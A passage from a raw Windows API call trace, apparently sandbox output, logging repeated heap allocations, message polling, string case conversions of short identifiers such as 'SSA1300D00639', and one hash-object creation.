Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.427] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.427] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0254.427] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.428] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0254.428] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.428] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.428] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.428] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.428] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.428] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.428] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.428] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.429] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.429] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.429] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.429] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.429] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.429] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.429] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.429] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.430] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0254.430] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.430] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0254.430] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.430] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.430] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.430] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.431] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.431] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.431] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.431] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.431] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.431] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.431] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.432] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.432] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.432] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.432] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.432] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.432] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.432] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.433] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.433] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.433] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.433] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.433] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.433] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.433] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.433] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.434] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.434] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.434] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.435] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.435] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.435] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.435] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.435] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.435] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.435] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.436] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0254.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 